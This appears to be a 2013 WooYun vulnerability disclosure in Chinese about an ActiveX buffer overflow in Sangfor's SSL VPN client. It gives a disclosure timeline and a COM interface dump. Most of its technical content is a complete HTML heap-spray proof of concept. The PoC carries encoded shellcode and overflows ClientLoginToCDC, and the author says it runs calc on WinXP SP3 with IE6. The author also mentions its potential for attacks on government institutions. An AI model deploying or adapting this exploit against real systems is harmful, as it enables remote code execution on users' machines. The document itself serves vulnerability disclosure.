乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-09-30: 细节已通知厂商并且等待厂商处理中 2013-09-30: 厂商已经确认,细节仅向厂商公开 2013-10-03: 细节向第三方安全合作伙伴开放 2013-11-24: 细节向核心白帽子及相关领域专家公开 2013-12-04: 细节向普通白帽子公开 2013-12-14: 细节向实习白帽子公开 2013-12-29: 细节向公众公开
对电信研究院渗透时候发现使用深信服的sslvpn,好奇的分析了一下。深信服的sslvpn使用范围比较广,可基于该漏洞进行apt攻击。国内的政府、科研机构存在被apt打击的风险。
C:\Program Files\Dranzer_GUI\Dranzer_GUI>Dranzer.exe -i c:\1.txt -lGenerating Interface for COM Object - {250587D2-6704-4479-8718-3C7E163B4213} CSClientManager Class*******************************************************************************Interface for COM Object - {250587D2-6704-4479-8718-3C7E163B4213} CSClientManager Class*******************************************************************************COM Object Filename : C:\Program Files\Sinfor\SSL\ClientComponent\CSClientManagerPrj.dllMajor Version : 4Minor Version : 2Build Number : 1Revision Number : 3Product Version : 4, 2, 1, 3Product Name : CSClientManagerPrj ModuleCompany Name :Legal Copyright : Copyright 2009Comments : SSL VPN CS Client ManagerFile Description : CSClientManagerPrj ModuleFile Version : 4, 2, 1, 3Internal Name : CSClientManagerPrjLegal Trademarks :Private Build :Special Build : 20081217Language : not found**************************************************************************************************************************************************************
Download for the activex https://vpn.catr.cn
测试通过winxp sp3 IE6 run calc
<html><body><object classid='clsid:250587D2-6704-4479-8718-3C7E163B4213' id="target"></object> <script>shellcode = unescape('%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+'%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+'%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+'%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'+'%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'+'%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'+'%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'+'%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e');nops=unescape('%u9090%u9090');headersize =20;slackspace= headersize + shellcode.length;while(nops.length < slackspace) nops+= nops;fillblock= nops.substring(0, slackspace);block= nops.substring(0, nops.length- slackspace);while( block.length+ slackspace<0x50000) block= block+ block+ fillblock;memory=new Array();for( counter=0; counter<200; counter++) memory[counter]= block + shellcode;buffer='';for( counter=0; counter<=1100; counter++) buffer+=unescape("%0D%0D%0D%0D");target.ClientLoginToCDC(buffer,1,"defaultv",1,"defaultv",1,1);</script></body></html>
fix
危害等级:高
漏洞Rank:12
确认时间:2013-09-30 21:54
2014-01-02:该问题已在10月初修复